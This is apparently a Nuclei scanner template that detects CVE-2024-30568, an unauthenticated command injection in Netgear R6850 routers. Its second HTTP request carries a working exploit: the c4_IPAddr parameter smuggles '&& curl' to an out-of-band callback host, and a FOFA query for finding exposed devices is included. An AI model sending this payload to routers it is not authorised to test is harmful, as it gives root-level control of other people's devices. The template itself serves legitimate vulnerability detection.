id: CVE-2024-30568 info: name: Netgear R6850 V1.1.0.88 - Command Injection author: ritikchaddha severity: critical description: | Netgear R6850 router firmware version V1.1.0.88 suffers from a command injection vulnerability in the ping_test functionality. An unauthenticated attacker can inject arbitrary system commands through the c4_IPAddr parameter, resulting in remote code execution as root. impact: | Attackers can execute arbitrary commands on the router, leading to complete device compromise. remediation: | Update Netgear R6850 firmware to a version that patches the command injection vulnerability. reference: - https://github.com/funny-mud-peee/IoT-vuls/blob/main/netgear%20R6850/Netgear-R6850%20V1.1.0.88%20Command%20Injection(ping_test).md - https://nvd.nist.gov/vuln/detail/CVE-2024-30568 - https://www.netgear.com/about/security/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-30568 cwe-id: CWE-94 epss-score: 0.89661 epss-percentile: 0.99582 metadata: verified: true max-request: 1 product: Netgear R6850 Router vendor: Netgear version: V1.1.0.88 fofa-query: app="NETGEAR" && "R6850" tags: cve,cve2024,cve2024-30568,netgear,router,rce,oast,iot,rce,command-injection,vuln flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: word part: response words: - "netgear" case-insensitive: true internal: true - raw: - | POST /setup.cgi?id=0&sp=1337 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded todo=ping_test&c4_IPAddr=127.0.0.1 && curl {{interactsh-url}}&next_file=diagping.htm matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - "dns" condition: or - type: status status: - 200 # digest: 4a0a00473045022100e890b7f0d9a20c94cbb66539f4991dd4732b10741e2ee93d9f28374f0d934306022046e01fd04aca41810e6e042f2229c8fe26990a007b4a7a5ac82767cc1f072438:922c64590222798bb761d5b6d8e72950